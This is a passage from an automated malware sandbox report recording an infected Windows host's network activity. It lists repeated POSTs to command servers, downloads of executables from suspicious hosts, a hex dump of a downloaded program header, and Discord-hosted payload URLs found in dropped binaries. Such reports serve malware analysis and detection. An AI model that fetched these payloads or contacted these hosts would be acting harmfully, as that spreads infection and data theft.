00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
Source: global traffic HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Fri, 29 Oct 2021 13:32:12 GMTContent-Type: application/octet-streamContent-Length: 916735Connection: keep-aliveLast-Modified: Wed, 01 Sep 2021 16:21:39 GMTETag: "612fa893-dfcff"Accept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 12 00 17 19 74 5c 00 10 0c 00 12 10 00 00 e0 00 06 21 0b 01 02 19 00 5a 09 00 00 04 0b 00 00 0a 00 00 00 14 00 00 00 10 00 00 00 70 09 00 00 00 e0 61 00 10 00 00 00 02 00 00 04 00 00 00 01 00 00 00 04 00 00 00 00 00 00 00 00 b0 0c 00 00 06 00 00 1c 87 0e 00 03 00 00 00 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 c0 0a 00 9d 20 00 00 00 f0 0a 00 48 0c 00 00 00 20 0b 00 a8 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 0b 00 bc 33 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 10 0b 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 f1 0a 00 b4 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 58 58 09 00 00 10 00 00 00 5a 09 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 50 60 2e 64 61 74 61 00 00 00 fc 1b 00 00 00 70 09 00 00 1c 00 00 00 60 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 c0 2e 72 64 61 74 61 00 00 14 1f 01 00 00 90 09 00 00 20 01 00 00 7c 09 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 60 40 2e 62 73 73 00 00 00 00 28 08 00 00 00 b0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 60 c0 2e 65 64 61 74 61 00 00 9d 20 00 00 00 c0 0a 00 00 22 00 00 00 9c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 40 2e 69 64 61 74 61 00 00 48 0c 00 00 00 f0 0a 00 00 0e 00 00 00 be 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 43 52 54 00 00 00 00 2c 00 00 00 00 00 0b 00 00 02 00 00 00 cc 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 74 6c 73 00 00 00 00 20 00 00 00 00 10 0b 00 00 02 00 00 00 ce 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 73 72 63 00 00 00 a8 04 00 00 00 20 0b 00 00 06 00 00 00 d0 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 c0 2e 72 65 6c 6f 63 00 00 bc 33 00 00 00 30 0b 00 00 34 00 00 00 d6 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 30 42 2f 34 00 00 00 00 00 00 d8 02 00 00 00 70 0b 00 00 04 00 00 00 0a 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 40 42 2f 31 39 00 00 00 00 00 d8 98 00 00 00 80 0b 00 00 9a 00 00 00 0e 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 33 31 00 00 00 00 00 f5 1a 00 00 00 20 0c 00 00 1c 00 00 00 a8 0b 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 10 42 2f 34 35 00 00 00 00 00 80 1a 00 00 00 40 0c 00 00 1c
Uses insecure TLS / SSL version for HTTPS connection
Source: unknown HTTPS traffic detected: 162.159.135.233:443 -> 192.168.2.7:49829 version: TLS 1.0
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bkhtxo.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 193Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qucostkxtw.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 204Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kslrhwirq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 159Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vbyddwsgl.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 247Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ckkawpd.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://qjhggbh.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 304Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://yilaxxc.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://mlylmiecm.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 354Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xquhxc.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 134Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lnvqewf.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://xpqaga.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 303Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nxvperioa.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 187Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kclljmjl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifkorrg.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 155Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uknlp.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://agijcahi.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 112Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fqyeks.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 162Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kmpicq.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 302Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nyssomocem.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 330Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wplogk.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 203Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://uuiisjmkv.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 192Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://siawn.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 264Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://vvqdkujnt.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 176Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://wogvus.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 338Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://alsla.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 327Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://bpoitfpcxi.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 119Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ryypml.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 233Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ifklliaybe.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 110Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://omliatj.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 250Host: hajezey1.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ikgpguftl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 214Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://udluixh.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 277Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://lbbxr.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 336Host: hajezey1.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 135Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 118Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dkukb.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 167Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://kvxhgwiwd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 367Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 215Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 183Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fqytd.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 270Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 335Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://dqqtfxwl.org/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 312Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 364Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://knanvvmjy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 324Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://fmwfrtbvy.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 256Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 124Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 196Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://ombhsev.com/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 170Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 127Host: nusurtal4f.net
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://193.56.146.214/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 423Host: 193.56.146.214
Source: global traffic HTTP traffic detected: POST / HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://nusurtal4f.net/User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 201Host: nusurtal4f.net
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: RTCOMM-ASRU RTCOMM-ASRU
IP address seen in connection with other malware
Source: Joe Sandbox View IP Address: 81.177.141.36 81.177.141.36
Source: Joe Sandbox View IP Address: 193.56.146.214 193.56.146.214
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.7:49844 -> 93.115.20.139:28978
Source: 86B8.exe.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: 86B8.exe.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: 8746.exe.7.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDTimestampingCA.crt0
Source: AdvancedRun.exe.31.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSACodeSigningCA.crl0s
Source: 86B8.exe.7.dr String found in binary or memory: http://crl.sectigo.com/SectigoRSATimeStampingCA.crl0t
Source: 86B8.exe.7.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: 8746.exe.7.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0P
Source: 86B8.exe.7.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: 8746.exe.7.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-ts.crl02
Source: 86B8.exe.7.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: 86B8.exe.7.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: 8746.exe.7.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-ts.crl0
Source: AdvancedRun.exe.31.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSACodeSigningCA.crt0#
Source: 86B8.exe.7.dr String found in binary or memory: http://crt.sectigo.com/SectigoRSATimeStampingCA.crt0#
Source: 5D4.exe.7.dr String found in binary or memory: http://fontello.com
Source: 86B8.exe.7.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: 86B8.exe.7.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: 8746.exe.7.dr String found in binary or memory: http://ocsp.digicert.com0O
Source: 86B8.exe.7.dr String found in binary or memory: http://ocsp.sectigo.com0
Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr String found in binary or memory: http://tempuri.org/DetailsDataSet1.xsd
Source: explorer.exe, 00000007.00000000.296667316.0000000006840000.00000004.00000001.sdmp String found in binary or memory: http://www.autoitscript.com/autoit3/J
Source: 8746.exe.7.dr String found in binary or memory: http://www.digicert.com/CPS0
Source: AdvancedRun.exe, AdvancedRun.exe, 00000023.00000002.433249054.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe, 0000002A.00000000.454048622.000000000040C000.00000002.00020000.sdmp, AdvancedRun.exe.31.dr String found in binary or memory: http://www.nirsoft.net/
Source: sqlite3.dll.36.dr String found in binary or memory: http://www.sqlite.org/copyright.html.
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526114763767818/A623D0D3.jpg
Source: 319A.exe, 0000001F.00000000.402921525.0000000000D52000.00000002.00020000.sdmp, 319A.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/902526117016109056/AB0F9338.jpg
Source: 8746.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903196811345395712/6058E8D5.jpg
Source: EDD.exe, 0000001C.00000000.384142005.0000000000812000.00000002.00020000.sdmp, EDD.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903333369742491648/1E88D378.jpg
Source: 5D4.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575517888925756/6D9E3C88.jpg
Source: 5D4.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903575519373697084/F83CB811.jpg
Source: 89D7.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580013041967104/06ED9A1B.jpg
Source: 89D7.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580015046828032/039F9A54.jpg
Source: 89D7.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580017093660692/A303D181.jpg
Source: 89D7.exe.7.dr String found in binary or memory: https://cdn.discordapp.com/attachments/893177342426509335/903580019203387432/930B55FC.jpg
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: AdvancedRun.exe.31.dr String found in binary or memory: https://sectigo.com/CPS0C
Source: 86B8.exe.7.dr String found in binary or memory: https://sectigo.com/CPS0D
Source: 86B8.exe.7.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: 1xVPfvJcrg.36.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown DNS traffic detected: queries for: xacokuo8.top
Source: global traffic HTTP traffic detected: GET /downloads/toolspab2.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: privacytoolzforyou-6000.top
Source: global traffic HTTP traffic detected: GET /game.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: sysaheu90.top
Source: global traffic HTTP traffic detected: GET /agrybirdsgamerept HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: text/plain; charset=UTF-8Host: toptelete.top
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/9f3868956801fb92fa090557a1edc6020dc838a9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: GET /dl/buildz.exe HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like GeckoHost: znpst.top
Source: global traffic HTTP traffic detected: GET //l/f/9Z2CynwB3dP17SpzOnMI/7af57f772c6107cc1c44807ee6e54627588ad2f9 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/_51AzHwB3dP17SpzL5Xz/3c5ef2028f9a45f85119eb6cb39f21b264b252bf HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: global traffic HTTP traffic detected: GET //l/f/_51AzHwB3dP17SpzL5Xz/3fa38023efb6f7516e4aff23353cd7c666085597 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheHost: 194.180.174.181
Source: unknown Network traffic detected: HTTP traffic on port 49782 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49854
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49853
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49797
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49852
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49850
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49782
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49790
Source: unknown Network traffic detected: HTTP traffic on port 49853 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49852 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49829 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49854 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49797 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49850 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49833 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49805 -> 443
